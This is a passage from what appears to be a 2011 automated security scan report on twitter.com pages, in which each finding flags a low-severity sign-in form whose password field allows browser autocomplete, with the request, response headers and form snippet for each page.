<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="20f5def7206934b17bcbf61abd783704b930f089" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.117. http://twitter.com/moxiesoft

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /moxiesoft

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions

The form contains the following password field with autocomplete enabled: session[password]

Request

GET /moxiesoft HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:16:24 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224184-1250-55880
ETag: "c8b3c0b1df873136d3d1cad3c8b419ff"
Last-Modified: Fri, 28 Jan 2011 14:16:24 GMT
X-Runtime: 0.01726
Content-Type: text/html; charset=utf-8
Content-Length: 51386
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296224183777646; path=/; expires=Fri, 04-Feb-11 14:16:23 GMT; domain=.twitter.com
Set-Cookie: guest_id=129622418451783185; path=/; expires=Sun, 27 Feb 2011 14:16:24 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTRmYjYzZDBkM2FhODQ0MWJmMjI2Y2RiMWRmZjM2NDlmIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIyGj7zC0B--83af79b56916b6955fc5a806bee986cc03de516e; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="39995b45d2f232c1cb58490851c55daf92e10b1a" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.118. http://twitter.com/onlyjazz

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /onlyjazz

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions

The form contains the following password field with autocomplete enabled: session[password]

Request

GET /onlyjazz HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224920-98437-32805
ETag: "a870c25d2bf45fd1f02dca10a6c09b7f"
Last-Modified: Fri, 28 Jan 2011 14:28:40 GMT
X-Runtime: 0.00899
Content-Type: text/html; charset=utf-8
Content-Length: 49524
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="90abaf89b7ac90e951ef6e7e5a9e0300727dd12e" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.119. http://twitter.com/oschina

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /oschina

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions

The form contains the following password field with autocomplete enabled: session[password]

Request

GET /oschina HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:47 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224927-42931-41515
ETag: "4ec91c8ea22a5f99253e904c27c6fcbf"
Last-Modified: Fri, 28 Jan 2011 14:28:47 GMT
X-Runtime: 0.00766
Content-Type: text/html; charset=utf-8
Content-Length: 42639
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="365750092063ee6137b5d86232c44dadaac2cf54" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.120. http://twitter.com/rachbarnhart

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /rachbarnhart

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions

The form contains the following password field with autocomplete enabled: session[password]

Request

GET /rachbarnhart HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:34 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225034-44205-8520
ETag: "2d3e9ea7bdf09844d1aed67d3b8c66fc"
Last-Modified: Fri, 28 Jan 2011 14:30:34 GMT
X-Runtime: 0.01426
Content-Type: text/html; charset=utf-8
Content-Length: 52627
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="9bb94d77d374c2788e89a0e464a791615dc87c42" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.121. http://twitter.com/rem

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /rem

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions

The form contains the following password field with autocomplete enabled: session[password]

Request

GET /rem HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:36 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225036-70162-12873
ETag: "f1048f44c2dbfae0ca279695ab2f56e2"
Last-Modified: Fri, 28 Jan 2011 14:30:36 GMT
X-Runtime: 0.00958
Content-Type: text/html; charset=utf-8
Content-Length: 54681
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="bf957ce2c963e236a3db8e69aad5644774fc9a14" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.122. http://twitter.com/rickrussie

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /rickrussie

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions

The form contains the following password field with autocomplete enabled: session[password]

Request

GET /rickrussie HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:14 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225014-95753-62367
ETag: "8ac086fffec8d5f0dbc55eb3e67e6a96"
Last-Modified: Fri, 28 Jan 2011 14:30:14 GMT
X-Runtime: 0.00915
Content-Type: text/html; charset=utf-8
Content-Length: 51643
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="7b6516ad4d066e270cdd30df9e2481f822348a6d" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.123. http://twitter.com/roctimo

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /roctimo

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions

The form contains the following password field with autocomplete enabled: session[password]

Request

GET /roctimo HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:29:11 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224951-66281-31354
ETag: "9b0bbae04a168790126e11b0e79fd723"
Last-Modified: Fri, 28 Jan 2011 14:29:11 GMT
X-Runtime: 0.01993
Content-Type: text/html; charset=utf-8
Content-Length: 39421
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="1de4ca2eed34bdf6d5cc4affb5c8b98fff154c18" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.124. http://twitter.com/rwaldron

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /rwaldron

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions

The form contains the following password field with autocomplete enabled: session[password]

Request

GET /rwaldron HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:12 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225072-30588-18769
ETag: "467245d95e03c9c4efa08a62b5cdfe26"
Last-Modified: Fri, 28 Jan 2011 14:31:12 GMT
X-Runtime: 0.01191
Content-Type: text/html; charset=utf-8
Content-Length: 52265
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="651e642603287ecdd3a2ceecd3eac7f96739cbd9" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.125. http://twitter.com/ryanolson

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /ryanolson

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions

The form contains the following password field with autocomplete enabled: session[password]

Request

GET /ryanolson HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:39 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225039-20499-32646
ETag: "d2211433f4fd1a9e6d92a74f1cc30349"
Last-Modified: Fri, 28 Jan 2011 14:30:39 GMT
X-Runtime: 0.01104
Content-Type: text/html; charset=utf-8
Content-Length: 54351
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="6210ef55161043a5ac5bd7f4382aace83d7e2f8b" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.126. http://twitter.com/scott_gonzalez

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /scott_gonzalez

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions

The form contains the following password field with autocomplete enabled: session[password]

Request

GET /scott_gonzalez HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:38 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225038-20727-28381
ETag: "e3250478c3ea8a086affa5704f05f05d"
Last-Modified: Fri, 28 Jan 2011 14:30:38 GMT
X-Runtime: 0.01142
Content-Type: text/html; charset=utf-8
Content-Length: 46926
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="6a2f68483d628b0cabdc8637ba4c5b5b405c4e83" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.127. http://twitter.com/search

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /search

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions

The form contains the following password field with autocomplete enabled: session[password]

Request

GET /search HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:17 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225016-47325-41983
ETag: "98f573cd8faa541b15eed6e89977a1f8"
Last-Modified: Fri, 28 Jan 2011 14:30:16 GMT
X-Runtime: 0.07569
Content-Type: text/html; charset=utf-8
Content-Length: 19528
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlM2UyNzM1ZTZiZTAyMzMyZmQ2NWQ3MzBlYmU0MWEz%250AODA6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--b3402f9fff3f356babde838d74594264b0e647aa; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

